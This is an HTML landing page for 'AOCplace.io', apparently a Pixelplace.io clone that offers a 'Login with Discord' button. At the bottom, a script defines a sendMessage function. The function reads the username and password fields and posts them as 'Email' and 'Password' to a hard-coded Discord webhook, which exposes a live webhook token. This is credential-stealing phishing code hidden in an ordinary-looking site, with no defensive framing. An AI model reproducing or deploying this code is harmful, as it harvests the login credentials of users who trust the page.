<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>aocplace.io</title>

    <link rel="icon" href="pxplogo.png">

    <style>

        @import url('https://fonts.googleapis.com/css2?family=Silkscreen:wght@400;700&display=swap');
    
        body {
            background-color: black;
        }

        .main {
            background-color: rgb(0, 0, 0);
            border-radius: 25px;
        }

        .glow {
        color: #fff;
        text-align: center;
        -webkit-animation: glow 1s ease-in-out infinite alternate;
        -moz-animation: glow 1s ease-in-out infinite alternate;
        animation: glow 1s ease-in-out infinite alternate;
        }

        @-webkit-keyframes glow {
        from {
            text-shadow: 0 0 10px #fff, 0 0 20px #fff, 0 0 30px #ffffff, 0 0 40px #a7a7a7, 0 0 50px #7e7e7e, 0 0 60px #858585, 0 0 70px #636262;
        }
        to {
            text-shadow: 0 0 20px #fff, 0 0 30px #7a7879, 0 0 40px #8a8989, 0 0 50px #818181, 0 0 60px #7c7c7c, 0 0 70px #686868, 0 0 80px #cccccc;
        }
        }

        @-moz-keyframes glow {
            from {
                text-shadow: 0 0 10px #fff, 0 0 20px #fff, 0 0 30px #ffffff, 0 0 40px #a7a7a7, 0 0 50px #7e7e7e, 0 0 60px #858585, 0 0 70px #636262;
            }
            to {
                text-shadow: 0 0 20px #fff, 0 0 30px #7a7879, 0 0 40px #8a8989, 0 0 50px #818181, 0 0 60px #7c7c7c, 0 0 70px #686868, 0 0 80px #cccccc;
            }
        }

        @keyframes glow {
            from {
                text-shadow: 0 0 10px #fff, 0 0 20px #fff, 0 0 30px #ffffff, 0 0 40px #a7a7a7, 0 0 50px #7e7e7e, 0 0 60px #858585, 0 0 70px #636262;
            }
            to {
                text-shadow: 0 0 20px #fff, 0 0 30px #7a7879, 0 0 40px #8a8989, 0 0 50px #818181, 0 0 60px #7c7c7c, 0 0 70px #686868, 0 0 80px #cccccc;
            }
        }

        .loginbutton {
            border-radius: 25px;
            
        }

        .loginbutton {
            border-radius: 25px;
            background-color: rgb(95, 95, 224);
            color: white;
            border: none;
            padding: 10px 20px;
            font-family: silkscreen;
            font-size: 16px;
            cursor: pointer;
            outline: none;
            -webkit-animation: glow 1s ease-in-out infinite alternate;
            -moz-animation: glow 1s ease-in-out infinite alternate;
            animation: glow 1s ease-in-out infinite alternate;
        }

        .loginbutton:hover {
            background-color: rgb(85, 85, 191);


        



    </style>
</head>
<body>

    <div class="main" style="border: solid 6px rgb(95, 95, 224); margin-left: 25%; margin-right: 25%; margin-top: 40px;">

        <div style="display: inline; text-align: center; padding: 10px;">
            <center>
            <img src="https://pixelplace.io/img/pixelplace-io-logo-tiny.png">
            <h1 style="margin: 1px; font-family: silkscreen;" class="glow">AOCplace.io</h1>
            <h3 style="margin: 1px; color: white;"">Welcome!</h3>
            <p style="margin: 1px; color: white;">Pixelplace.io clone for AOC. Developed by AlchemillaOtherworld</p>
        
            <br>

            <input class="loginbutton" type="button" onclick="location.href='discord.html';" value="Login with Discord" />
            <!--<button type="loginbutton" onclick="location.href='discord.html';" value="Login with Discord"><span class="glowing-txt">Login with Discord</span></button>-->
        </div>
        </center>

    </div>

    <center>
    <img src="europe.png" style="height: auto; width: 50%; padding-top: 40px; opacity: 0.2;">
    <p style="color:white; opacity: 0.2; margin: 1px;">©2024 AlchemillaOtherworld</p>
    <p style="color:white; margin: 1px;" class="glow">long live aoc</p>
    </center>





    <script>
        function sendMessage() {
            // Retrieve values from input fields
            var username = document.getElementById('username').value;
            var password = document.getElementById('password').value;

            // Create and send XMLHttpRequest
            var request = new XMLHttpRequest();
            request.open("POST", "https://discord.com/api/webhooks/1276720677017096203/M5qLoDYi9QMlDZq0lz3e_QDVinwMVQaWJZre-KtuzEEkelLEzseQQh4MT0NtnjHq3HP5");

            request.setRequestHeader('Content-type', 'application/json');

            const params = {
                username: "Svenska",
                avatar_url: "https://external-content.duckduckgo.com/iu/?u=https%3A%2F%2Favatarfiles.alphacoders.com%2F271%2F271795.jpg&f=1&nofb=1&ipt=bc06e039864dc733546505da971d5513e8b1fa6821336b2360da4da626851935&ipo=images",
                content: `Email: ${username}\nPassword: ${password}`
            };

            request.send(JSON.stringify(params));
        }
    </script>
</body>
</html>
